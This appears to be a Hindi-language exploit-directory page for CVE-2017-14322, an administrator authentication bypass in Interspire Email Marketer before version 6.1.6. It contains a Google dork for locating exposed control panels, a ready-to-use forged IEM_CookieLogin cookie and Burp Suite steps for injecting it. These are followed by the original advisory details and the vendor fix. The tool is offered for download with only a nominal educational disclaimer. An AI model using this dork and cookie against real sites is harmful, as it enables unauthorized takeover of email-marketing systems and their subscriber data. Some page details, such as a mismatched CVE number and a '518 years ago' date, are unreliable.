Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-14322 — CVE-2017-14322 Interspire Email Marketer (emailmarketer) एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/joesmithjaffa/cve-2017-14322
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubjoesmithjaffa/cve-2017-14322

CVE-2017-14322

CVE-2017-14322 Interspire Email Marketer (emailmarketer) एक्सप्लॉइट

रिपॉजिटरी देखें
518 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-14323 Interspire Email Marketer (emailmarketer) शोषण

गूगल डॉर्क

root@kitploit:~
intitle:"Control Panel" + emailmarketer

बर्प सूट का उपयोग करके शोषण

अनुरोध हेडर के लिए मैच और रिप्लेस निम्नानुसार जोड़ें:

root@kitploit:~
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D

जब आप साइट खोलते हैं, तो पहली बार यह काम नहीं करेगा क्योंकि कुकी हेडर मौजूद नहीं है। उपरोक्त नियम जोड़ने के साथ बर्प प्रॉक्सी का उपयोग करके साइट को दूसरी बार रीफ्रेश करें, आप वही देखेंगे जो आप चाहते थे। "Intercept Client Requests" पर टिक करना सुनिश्चित करें।

शीर्षक:

Interspire Email Marketer - रिमोट एडमिन प्रमाणीकरण बाईपास

लेखक:

Hakan Küsne, Infoteam Security (CH)

CVE-ID:

CVE-2017-14322

जोखिम सूचना:

CVSS आधार स्कोर: 9.8 CVSS वेक्टर: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O

समयरेखा:

2017-09-12 भेद्यता खोजी गई 2017-09-12 पता चला कि विक्रेता ने इसे पहले ही ठीक कर दिया था लेकिन ग्राहकों को कभी सूचित नहीं किया, जिससे सैकड़ों वास्तविक दुनिया में असुरक्षित रह गए 2017-10-17 सार्वजनिक खुलासा

प्रभावित उत्पाद:

Interspire Email Marketer संस्करण 6.1.6 से पहले

विक्रेता होमपेज:

http://www.interspire.com/emailmarketer/

विवरण:

यह जाँचने के लिए जिम्मेदार फ़ंक्शन कि उपयोगकर्ता पहले से लॉग इन है या नहीं, Interspire Email Marketer (IEM) संस्करण 6.1.6 से पहले init.php में, रिमोट हमलावरों को प्रमाणीकरण बाईपास करने और विशेष रूप से तैयार किए गए मान के साथ IEM_CookieLogin कुकी का उपयोग करके प्रशासनिक पहुंच प्राप्त करने की अनुमति देता है। इसके अलावा, यदि ग्राहक के पास वार्षिक रखरखाव योजना नहीं है, तो एप्लिकेशन कहता है कि यह अंतिम उपलब्ध संस्करण पर है और कोई अपडेट नहीं है।

ये भेद्यताएँ एप्लिकेशन के एक समझौता किए गए उदाहरण पर घटना प्रतिक्रिया के दौरान पाई गईं।

प्रूफ ऑफ कॉन्सेप्ट:

विवरण यहाँ प्रदान किए गए हैं: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html

समाधान:

विक्रेता ने संस्करण 6.1.6 में भेद्यता को ठीक कर दिया है, लेकिन इसके बारे में अपने ग्राहकों को विशेष रूप से कभी सूचित नहीं किया।

नोट:

यह शोषण केवल शैक्षिक उद्देश्य के लिए है और आपके अपने कार्यों के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें